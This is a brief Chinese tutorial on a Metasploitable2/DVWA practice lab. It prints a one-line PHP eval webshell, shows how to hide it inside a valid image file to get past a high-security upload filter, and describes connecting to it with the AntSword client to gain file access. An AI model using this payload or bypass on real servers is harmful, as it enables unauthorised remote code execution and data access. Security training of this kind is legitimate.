本文使用metasploitable2
进行演示
本文内容仅供交流学习使用,禁止用于不法用途!!!
一句话木马
1
<?php @eval($_POST['176']) ?>
将代码传入php-cgi
即可达到我们执行shell
命令的目的
上传代码
对于安全级别为High
的DVMA
来说,其包含的上传图片功能,我们单纯通过修改文件后缀名、PureSuite
改变文件类型是无法做到的,还要保证符合文件特征
文件不合规范会提示以下信息:
我们通常得进行数据包含!
在一张正常的图片中,追加一段php
代码,此处我们使用GHex
。
然后改名为176.php.jpg
即可上传上去。
最后打开中国蚁剑,输入地址:http://xxx.xxx.xxx.xxx/hackable/uploads/176.php.jpg
,密码:176
即可拿到webshell,可以访问所有目录文件夹。渗透成功。
PS: 在我的
Metasploitable2
中,其他教程中提到的截%00
、../fi/?page=file:///var/www/dvwa/hackable/uploads/xxx
好像都没用emm截取0尝试(失败):
访问网址:
File not found.